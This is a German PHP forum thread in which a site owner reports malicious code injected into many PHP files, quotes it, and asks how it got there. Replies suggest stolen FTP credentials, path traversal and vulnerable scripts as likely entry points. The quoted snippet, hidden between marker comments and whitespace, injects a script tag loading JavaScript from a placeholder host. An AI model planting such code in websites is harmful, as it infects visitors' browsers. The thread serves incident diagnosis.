Ankündigung

Einklappen
Keine Ankündigung bisher.

Wie kommt der Schadcode auf den Server?

Einklappen

Neue Werbung 2019

Einklappen
X
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Wie kommt der Schadcode auf den Server?

    Hallo,

    folgender Schadcode hat sich in einigen PHP-Dateien auf meinem Server eingenistet. Der Code wurde meist unter den bestehenden Code geschrieben.

    PHP-Code:
    <?php
    #afc99c#
                                                                                                                                                                                                                                                              
    if(empty($j)) {
    $j "<script type=\"text/javascript\" src=\"http://pfad.zu/boesem/script.js\"></script>";
    echo 
    $j;
    }

    #/afc99c#
    ?>
    Ich habe alle Eingabefelder auf ausreichende Validierung überprüft. Auch in der Datenbank sind keine auffälligen Einträge, daher schließe ich auch eine SQL-Injection aus.

    Was mich verwundert, auch statische Seiten sind betroffen. Weiß vielleicht jemand was dieses "#afc99c#" zu bedeuten hat und ob das ein Hinweis auf die Schwachstelle geben kann?

    Ich bin grad ziemlich ratlos wie der Schadcode da hingekommen ist und bin für jeden Hinweis dankbar.

    Viele Grüße


  • #2
    Das wie kann man dir mit diesem Code nicht beantworten.
    Für das wie wären mal folgende Informationen interesant:
    Welches CMS nutzt du?
    Hast du Zugriff auf die FTP-Logs?
    Was für eine Art von Webspace hast du?
    mysql ist veraltet Mails senden: Ohne Probleme und ohne mail()
    PHP-Code:
    echo 'PS: <b>Meine Antwort ist keine Lösung, sondern nur eine Hilfe zur Lösung.</b>'

    Kommentar


    • #3
      Wie bereits gesagt ist das wahrscheinlichste eine FTP-Sicherheitslücke (Passwort ändern, Serverversion auf bekannte Lücken prüfen).

      Schreibst du evtl. i-wo in Dateien und lässt den Pfad per Parameter wählen (hab ich schon 1-2x gesehen, das kann natürlich mit ein paar ../ auch gut auf ungewünschte Dateien angewandt werden).
      ?!? Woot Woot...

      Kommentar


      • #4
        #afc99c# #/afc99c# sind Marker um den Code wiederzufinden (damit er geändert werden aknn). Ursprung für sowas sind meistens weitverbreitete Scripts mit Sicherheitslücken oder ausgespähte Zugangsdaten für den FTP. (Filezilla gabs ende letzten/anfang diesen Jahres mit integrierter Backdoor aus diversen Quellen)

        Kommentar

        Lädt...
        X